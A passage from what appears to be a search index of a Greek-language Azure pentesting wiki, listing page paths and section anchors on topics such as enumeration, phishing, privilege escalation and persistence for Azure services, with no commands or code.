formation/index.html#ids-Πόρων-azure","pentesting-cloud/azure-security/az-basic-information/index.html#azure-vs-entra-id-vs-Υπηρεσίες-Τομέα-azure-ad","pentesting-cloud/azure-security/az-basic-information/index.html#azure","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-πρώην-azure-active-directory","pentesting-cloud/azure-security/az-basic-information/index.html#Υπηρεσίες-Τομέα-entra-πρώην-azure-ad-ds","pentesting-cloud/azure-security/az-basic-information/index.html#principals-entra-id","pentesting-cloud/azure-security/az-basic-information/index.html#Χρήστες","pentesting-cloud/azure-security/az-basic-information/index.html#Προεπιλεγμένες-Άδειες-Μελών--Επισκεπτών","pentesting-cloud/azure-security/az-basic-information/index.html#Προεπιλεγμένες-Ρυθμίσεις-Άδειας-Χρηστών","pentesting-cloud/azure-security/az-basic-information/index.html#Ομάδες","pentesting-cloud/azure-security/az-basic-information/index.html#Υπηρεσίες-principals","pentesting-cloud/azure-security/az-basic-information/index.html#Εγγραφές-Εφαρμογών","pentesting-cloud/azure-security/az-basic-information/index.html#Προεπιλεγμένες-Άδειες-Συγκατάθεσης","pentesting-cloud/azure-security/az-basic-information/index.html#Διαχειριζόμενη-Ταυτότητα-Μεταδεδομένα","pentesting-cloud/azure-security/az-basic-information/index.html#Επιχειρησιακές-Εφαρμογές","pentesting-cloud/azure-security/az-basic-information/index.html#Διοικητικές-Μονάδες","pentesting-cloud/azure-security/az-basic-information/index.html#Ρόλοι--Άδειες-entra-id","pentesting-cloud/azure-security/az-basic-information/index.html#Ρόλοι--Άδειες-azure","pentesting-cloud/azure-security/az-basic-information/index.html#Ενσωματωμένοι-ρόλοι","pentesting-cloud/azure-security/az-basic-information/index.html#Προσαρμοσμένοι-Ρόλοι","pentesting-cloud/azure-security/az-basic-information/index.html#permissions-order","pentesting-cloud/azure-security/az-basic-information/index.html#global-administrator","pentesting-cloud/azure-security/az-basic-information/index.html#assignments-conditions--mfa","pentesting-cloud/azure-security/az-basic-information/index.html#deny-assignments","pentesting-cloud/azure-security/az-basic-information/index.html#azure-policies","pentesting-cloud/azure-security/az-basic-information/index.html#Κληρονομικότητα-Δικαιωμάτων","pentesting-cloud/azure-security/az-basic-information/index.html#azure-rbac-vs-abac","pentesting-cloud/azure-security/az-basic-information/index.html#Αναφορές","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#az---tokens--public-applications","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#basic-information","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#oauth","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#authentication-tokens","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#access-tokens-aud","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#access-tokens-scopes-scp","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#get-refresh--access-token-example","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Άλλα-πεδία-διακριτικού-πρόσβασης","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#foci-tokens-privilege-escalation","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Λάβετε-διαφορετικό-πεδίο","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Λάβετε-διαφορετικούς-πελάτες-και-πεδία-εφαρμογής","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Αναφορές","pentesting-cloud/azure-security/az-enumeration-tools.html#az---enumeration-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#Εγκατάσταση-powershell-σε-linux","pentesting-cloud/azure-security/az-enumeration-tools.html#Εγκατάσταση-powershell-σε-macos","pentesting-cloud/azure-security/az-enumeration-tools.html#Κύρια-Εργαλεία-Αρίθμησης","pentesting-cloud/azure-security/az-enumeration-tools.html#az-cli","pentesting-cloud/azure-security/az-enumeration-tools.html#az-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#microsoft-graph-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#azuread-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#automated-recon--compliance-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#turbot-azure-plugins","pentesting-cloud/azure-security/az-enumeration-tools.html#prowler","pentesting-cloud/azure-security/az-enumeration-tools.html#monkey365","pentesting-cloud/azure-security/az-enumeration-tools.html#scoutsuite","pentesting-cloud/azure-security/az-enumeration-tools.html#azure-mg-sub-governance-reporting","pentesting-cloud/azure-security/az-enumeration-tools.html#automated-post-exploitation-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#roadrecon","pentesting-cloud/azure-security/az-enumeration-tools.html#azurehound","pentesting-cloud/azure-security/az-enumeration-tools.html#microburst","pentesting-cloud/azure-security/az-enumeration-tools.html#powerzure","pentesting-cloud/azure-security/az-enumeration-tools.html#graphrunner","pentesting-cloud/azure-security/az-enumeration-tools.html#stormspotter","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#az---unauthenticated-enum--initial-entry","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#azure-tenant","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#tenant-enumeration","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#user-enumeration","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#password-spraying--brute-force","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#Υπηρεσίες-azure-που-χρησιμοποιούν-τομείς","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#filesystem-credentials","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#references","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#az---oauth-apps-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#oauth-app-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Άδειες-συγκατάθεσης-εφαρμογής","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#2-Τύποι-επιθέσεων","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Οι-χρήστες-επιτρέπεται-να-δίνουν-συγκατάθεση","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Διαχειριστές-Εφαρμογών","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Επισκόπηση-Ροής-Επίθεσης","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Παράδειγμα-Επίθεσης","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Άλλα-Εργαλεία","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#phishing-Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Διαχείριση-Εφαρμογών-entra-id","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Μετά-την-Εκμετάλλευση-της-Εφαρμογής","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Αναφορές","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#az---storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#open-storage","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#sas-urls","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#az---vms-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#Εικονικές-Μηχανές","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#Εκτεθειμένη-ευάλωτη-υπηρεσία","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#Δημόσιες-Εικόνες-Γκαλερί","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#Δημόσιες-Επεκτάσεις","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.html#az---phishing-Αυθεντικοποίησης-Κωδικού-Συσκευής","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#az---password-spraying","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#password-spray","pentesting-cloud/azure-security/az-services/index.html#az---Υπηρεσίες","pentesting-cloud/azure-security/az-services/index.html#Πύλες","pentesting-cloud/azure-security/az-services/index.html#Ακατέργαστα-αιτήματα","pentesting-cloud/azure-security/az-services/index.html#Λίστα-Υπηρεσιών","pentesting-cloud/azure-security/az-services/az-azuread.html#az---entra-id-azuread--azure-iam","pentesting-cloud/azure-security/az-services/az-azuread.html#basic-information","pentesting-cloud/azure-security/az-services/az-azuread.html#enumeration","pentesting-cloud/azure-security/az-services/az-azuread.html#connection","pentesting-cloud/azure-security/az-services/az-azuread.html#Ενοικιαστές","pentesting-cloud/azure-security/az-services/az-azuread.html#Χρήστες","pentesting-cloud/azure-security/az-services/az-azuread.html#mfa--conditional-access-policies","pentesting-cloud/azure-security/az-services/az-azuread.html#groups","pentesting-cloud/azure-security/az-services/az-azuread.html#service-principals","pentesting-cloud/azure-security/az-services/az-azuread.html#Εφαρμογές","pentesting-cloud/azure-security/az-services/az-azuread.html#managed-identities","pentesting-cloud/azure-security/az-services/az-azuread.html#Ρόλοι-azure","pentesting-cloud/azure-security/az-services/az-azuread.html#Ρόλοι-entra-id","pentesting-cloud/azure-security/az-services/az-azuread.html#Συσκευές","pentesting-cloud/azure-security/az-services/az-azuread.html#Διοικητικές-Μονάδες","pentesting-cloud/azure-security/az-services/az-azuread.html#Εξαπάτηση-Προνομίων-entra-id","pentesting-cloud/azure-security/az-services/az-azuread.html#Εξαπάτηση-Προνομίων-azure","pentesting-cloud/azure-security/az-services/az-azuread.html#Μηχανισμοί-Άμυνας","pentesting-cloud/azure-security/az-services/az-azuread.html#Διαχείριση-Προνομιακής-Ταυτότητας-pim","pentesting-cloud/azure-security/az-services/az-azuread.html#Πολιτικές-conditional-access","pentesting-cloud/azure-security/az-services/az-azuread.html#Προστασία-Ταυτότητας-entra","pentesting-cloud/azure-security/az-services/az-azuread.html#Προστασία-Κωδικών-entra","pentesting-cloud/azure-security/az-services/az-azuread.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-acr.html#az---acr","pentesting-cloud/azure-security/az-services/az-acr.html#basic-information","pentesting-cloud/azure-security/az-services/az-acr.html#enumerate","pentesting-cloud/azure-security/az-services/az-application-proxy.html#az---application-proxy","pentesting-cloud/azure-security/az-services/az-application-proxy.html#basic-information","pentesting-cloud/azure-security/az-services/az-application-proxy.html#enumeration","pentesting-cloud/azure-security/az-services/az-application-proxy.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-arm-templates.html#az---arm-templates--deployments","pentesting-cloud/azure-security/az-services/az-arm-templates.html#basic-information","pentesting-cloud/azure-security/az-services/az-arm-templates.html#history","pentesting-cloud/azure-security/az-services/az-arm-templates.html#search-sensitive-info","pentesting-cloud/azure-security/az-services/az-arm-templates.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#az---automation-accounts","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#basic-information","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#settings","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#runbooks--jobs","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#schedules--webhooks","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#source-control","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#runtime-environments","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#hybrid-worker-groups","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#state-configuration-sc","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#enumeration","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#Ανύψωση-Δικαιωμάτων--Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-app-services.html#az---app-services","pentesting-cloud/azure-security/az-services/az-app-services.html#app-service-basic-information","pentesting-cloud/azure-security/az-services/az-app-services.html#basic-authentication","pentesting-cloud/azure-security/az-services/az-app-services.html#kudu","pentesting-cloud/azure-security/az-services/az-app-services.html#sources","pentesting-cloud/azure-security/az-services/az-app-services.html#webjobs","pentesting-cloud/azure-security/az-services/az-app-services.html#slots","pentesting-cloud/azure-security/az-services/az-app-services.html#azure-function-apps","pentesting-cloud/azure-security/az-services/az-app-services.html#enumeration","pentesting-cloud/azure-security/az-services/az-app-services.html#Παραδείγματα-για-τη-δημιουργία-web-apps","pentesting-cloud/azure-security/az-services/az-app-services.html#python-από-το-τοπικό","pentesting-cloud/azure-security/az-services/az-app-services.html#python-από-το-github","pentesting-cloud/azure-security/az-services/az-app-services.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-app-services.html#references","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#az---cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#azure-cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#key-features","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#references","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#persistence","pentesting-cloud/azure-security/az-services/az-container-registry.html#az---container-registry","pentesting-cloud/azure-security/az-services/az-container-registry.html#basic-information","pentesting-cloud/azure-security/az-services/az-container-registry.html#permissions","pentesting-cloud/azure-security/az-services/az-container-registry.html#authentication","pentesting-cloud/azure-security/az-services/az-container-registry.html#Κρυπτογράφηση","pentesting-cloud/azure-security/az-services/az-container-registry.html#Δικτύωση","pentesting-cloud/azure-security/az-services/az-container-registry.html#microsoft-defender-for-cloud","pentesting-cloud/azure-security/az-services/az-container-registry.html#soft-delete","pentesting-cloud/azure-security/az-services/az-container-registry.html#webhooks","pentesting-cloud/azure-security/az-services/az-container-registry.html#Συνδεδεμένα-μητρώα","pentesting-cloud/azure-security/az-services/az-container-registry.html#Εκτελέσεις--Εργασίες","pentesting-cloud/azure-security/az-services/az-container-registry.html#cache","pentesting-cloud/azure-security/az-services/az-container-registry.html#enumeration","pentesting-cloud/azure-security/az-services/az-container-registry.html#Ανάβαση-Δικαιωμάτων--Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-container-registry.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-container-instances.html#az---container-instances","pentesting-cloud/azure-security/az-services/az-container-instances.html#basic-information","pentesting-cloud/azure-security/az-services/az-container-instances.html#configurations","pentesting-cloud/azure-security/az-services/az-container-instances.html#enumeration","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#az---cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#azure-cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#nosql-sql","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#mongodb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#todo","pentesting-cloud/azure-security/az-services/intune.html#az---intune","pentesting-cloud/azure-security/az-services/intune.html#basic-information","pentesting-cloud/azure-security/az-services/intune.html#cloud---on-prem","pentesting-cloud/azure-security/az-services/intune.html#references","pentesting-cloud/azure-security/az-services/az-file-shares.html#az---file-shares","pentesting-cloud/azure-security/az-services/az-file-shares.html#basic-information","pentesting-cloud/azure-security/az-services/az-file-shares.html#access-tiers","pentesting-cloud/azure-security/az-services/az-file-shares.html#backups","pentesting-cloud/azure-security/az-services/az-file-shares.html#supported-authentications-via-smb","pentesting-cloud/azure-security/az-services/az-file-shares.html#enumeration","pentesting-cloud/azure-security/az-services/az-file-shares.html#Σύνδεση","pentesting-cloud/azure-security/az-services/az-file-shares.html#Κανονική-καταμέτρηση-αποθήκευσης-κλειδιά-πρόσβασης-sas","pentesting-cloud/azure-security/az-services/az-file-shares.html#Κλιμάκωση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-file-shares.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-file-shares.html#Επιμονή","pentesting-cloud/azure-security/az-services/az-function-apps.html#az---function-apps","pentesting-cloud/azure-security/az-services/az-function-apps.html#basic-information","pentesting-cloud/azure-security/az-services/az-function-apps.html#different-plans","pentesting-cloud/azure-security/az-services/az-function-apps.html#storage-buckets","pentesting-cloud/azure-security/az-services/az-function-apps.html#networking","pentesting-cloud/azure-security/az-services/az-function-apps.html#function-app-settings--environment-variables","pentesting-cloud/azure-security/az-services/az-function-apps.html#function-sandbox","pentesting-cloud/azure-security/az-services/az-function-apps.html#managed-identities--metadata","pentesting-cloud/azure-security/az-services/az-function-apps.html#access-keys","pentesting-cloud/azure-security/az-services/az-function-apps.html#basic-authentication","pentesting-cloud/azure-security/az-services/az-function-apps.html#github-based-deployments","pentesting-cloud/azure-security/az-services/az-function-apps.html#Αναπτύξεις-Βασισμένες-σε-Κοντέινερ","pentesting-cloud/azure-security/az-services/az-function-apps.html#Αριθμητική","pentesting-cloud/azure-security/az-services/az-function-apps.html#Κλιμάκωση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-function-apps.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-keyvault.html#az---key-vault","pentesting-cloud/azure-security/az-services/az-keyvault.html#basic-information","pentesting-cloud/azure-security/az-services/az-keyvault.html#access-control","pentesting-cloud/azure-security/az-services/az-keyvault.html#key-vault-rbac-built-in-roles","pentesting-cloud/azure-security/az-services/az-keyvault.html#network-access","pentesting-cloud/azure-security/az-services/az-keyvault.html#Προστασία-Διαγραφής","pentesting-cloud/azure-security/az-services/az-keyvault.html#Απαρίθμηση","pentesting-cloud/azure-security/az-services/az-keyvault.html#Κλιμάκωση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-keyvault.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-logic-apps.html#az---logic-apps","pentesting-cloud/azure-security/az-services/az-logic-apps.html#basic-information","pentesting-cloud/azure-security/az-services/az-logic-apps.html#examples","pentesting-cloud/azure-security/az-services/az-logic-apps.html#visualize-a-logicapp","pentesting-cloud/azure-security/az-services/az-logic-apps.html#ssrf-protection","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Επιλογές-φιλοξενίας","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Αριθμητική","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Λογαριασμοί-Ενοποίησης","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#az---Ομάδες-Διαχείρισης-Συνδρομές--Ομάδες-Πόρων","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Ομάδες-Διαχείρισης","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Αρίθμηση","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Συνδρομές","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Αρίθμηση-1","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Ομάδες-Πόρων","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Απαρίθμηση","pentesting-cloud/azure-security/az-services/az-mysql.html#az---mysql-databases","pentesting-cloud/azure-security/az-services/az-mysql.html#azure-mysql","pentesting-cloud/azure-security/az-services/az-mysql.html#key-features","pentesting-cloud/azure-security/az-services/az-mysql.html#enumeration","pentesting-cloud/azure-security/az-services/az-mysql.html#Σύνδεση","pentesting-cloud/azure-security/az-services/az-mysql.html#Ανύψωση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-mysql.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-mysql.html#todo","pentesting-cloud/azure-security/az-services/az-postgresql.html#az---postgresql-databases","pentesting-cloud/azure-security/az-services/az-postgresql.html#azure-postgresql","pentesting-cloud/azure-security/az-services/az-postgresql.html#key-features","pentesting-cloud/azure-security/az-services/az-postgresql.html#enumeration","pentesting-cloud/azure-security/az-services/az-postgresql.html#Σύνδεση","pentesting-cloud/azure-security/az-services/az-postgresql.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-postgresql.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-postgresql.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-postgresql.html#todo","pentesting-cloud/azure-security/az-services/az-queue-enum.html#az---queue-storage","pentesting-cloud/azure-security/az-services/az-queue-enum.html#basic-information","pentesting-cloud/azure-security/az-services/az-queue-enum.html#enumeration","pentesting-cloud/azure-security/az-services/az-queue-enum.html#Ανύψωση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-queue-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-queue-enum.html#Επιμονή","pentesting-cloud/azure-security/az-services/az-queue-enum.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#az---service-bus-enum","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#service-bus","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#key-concepts","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#advance-features","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#authorization-rule--sas-policy","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#namespace","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#enumeration","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#Ανύψωση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-sql.html#az---sql","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-database","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-managed-instance","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-virtual-machines","pentesting-cloud/azure-security/az-services/az-sql.html#enumeration","pentesting-cloud/azure-security/az-services/az-sql.html#Σύνδεση-και-εκτέλεση-ερωτημάτων-sql","pentesting-cloud/azure-security/az-services/az-sql.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-sql.html#Ανύψωση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-sql.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#az---static-web-apps","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#static-web-apps-basic-information","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#deployment-authentication","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#web-app-basic-authentication","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#Διαδρομές--Ρόλοι","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#managed-identities","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#enumeration","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#Παραδείγματα-για-τη-δημιουργία-Ιστοσελίδων","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#Ανάβαση-Δικαιωμάτων-και-Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-storage.html#az---Λογαριασμοί-Αποθήκευσης--blobs","pentesting-cloud/azure-security/az-services/az-storage.html#Βασικές-Πληροφορίες","pentesting-cloud/azure-security/az-services/az-storage.html#Τερματικά-Αποθήκευσης","pentesting-cloud/azure-security/az-services/az-storage.html#Δημόσια-Έκθεση","pentesting-cloud/azure-security/az-services/az-storage.html#Σύνδεση-με-την-Αποθήκευση","pentesting-cloud/azure-security/az-services/az-storage.html#Πρόσβαση-στην-Αποθήκευση","pentesting-cloud/azure-security/az-services/az-storage.html#rbac","pentesting-cloud/azure-security/az-services/az-storage.html#Κλειδιά-Πρόσβασης","pentesting-cloud/azure-security/az-services/az-storage.html#Κοινά-Κλειδιά--Ελαφριά-Κοινά-Κλειδιά","pentesting-cloud/azure-security/az-services/az-storage.html#shared-access-signature--sas","pentesting-cloud/azure-security/az-services/az-storage.html#sftp-support-for-azure-blob-storage","pentesting-cloud/azure-security/az-services/az-storage.html#Κύρια-Χαρακτηριστικά","pentesting-cloud/azure-security/az-services/az-storage.html#Απαιτήσεις-Ρύθμισης","pentesting-cloud/azure-security/az-services/az-storage.html#Δικαιώματα","pentesting-cloud/azure-security/az-services/az-storage.html#enumeration","pentesting-cloud/azure-security/az-services/az-storage.html#Κοινές-Χρήσεις-Αρχείων","pentesting-cloud/azure-security/az-services/az-storage.html#Κλιμάκωση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/az-storage.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/az-storage.html#Επιμονή","pentesting-cloud/azure-security/az-services/az-storage.html#Αναφορές","pentesting-cloud/azure-security/az-services/az-table-storage.html#az---table-storage","pentesting-cloud/azure-security/az-services/az-table-storage.html#basic-information","pentesting-cloud/azure-security/az-services/az-table-storage.html#keys","pentesting-cloud/azure-security/az-services/az-table-storage.html#enumeration","pentesting-cloud/azure-security/az-services/az-table-storage.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-table-storage.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-table-storage.html#persistence","pentesting-cloud/azure-security/az-services/vms/index.html#az---Εικονικές-Μηχανές--Δίκτυο","pentesting-cloud/azure-security/az-services/vms/index.html#Βασικές-Πληροφορίες-Δικτύωσης-azure","pentesting-cloud/azure-security/az-services/vms/index.html#Βασικές-πληροφορίες-για-vms","pentesting-cloud/azure-security/az-services/vms/index.html#Ρυθμίσεις-Ασφαλείας","pentesting-cloud/azure-security/az-services/vms/index.html#Δίσκοι--στιγμιότυπα","pentesting-cloud/azure-security/az-services/vms/index.html#Εικόνες-Γκαλερί-Εικόνων--Σημεία-Επαναφοράς","pentesting-cloud/azure-security/az-services/vms/index.html#azure-site-recovery","pentesting-cloud/azure-security/az-services/vms/index.html#azure-bastion","pentesting-cloud/azure-security/az-services/vms/index.html#Μεταδεδομένα","pentesting-cloud/azure-security/az-services/vms/index.html#Απαρίθμηση-vm","pentesting-cloud/azure-security/az-services/vms/index.html#Εκτέλεση-Κώδικα-σε-vms","pentesting-cloud/azure-security/az-services/vms/index.html#Επεκτάσεις-vm","pentesting-cloud/azure-security/az-services/vms/index.html#Σχετικές-επεκτάσεις-vm","pentesting-cloud/azure-security/az-services/vms/index.html#Εφαρμογές-vm","pentesting-cloud/azure-security/az-services/vms/index.html#Δεδομένα-χρήστη","pentesting-cloud/azure-security/az-services/vms/index.html#Προσαρμοσμένα-δεδομένα","pentesting-cloud/azure-security/az-services/vms/index.html#Εκτέλεση-Εντολής","pentesting-cloud/azure-security/az-services/vms/index.html#Ανύψωση-Δικαιωμάτων","pentesting-cloud/azure-security/az-services/vms/index.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/azure-security/az-services/vms/index.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-services/vms/index.html#Επιμονή","pentesting-cloud/azure-security/az-services/vms/index.html#Αναφορές","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#az---azure-network","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#basic-information","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#virtual-network-vnet--subnets","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Ομάδες-Ασφαλείας-Δικτύου-nsg","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Απαρίθμηση","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-firewall","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-1","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-route-tables","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-2","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-private-link","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-3","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-service-endpoints","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-4","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Διαφορές-Μεταξύ-service-endpoints-και-private-links","pentes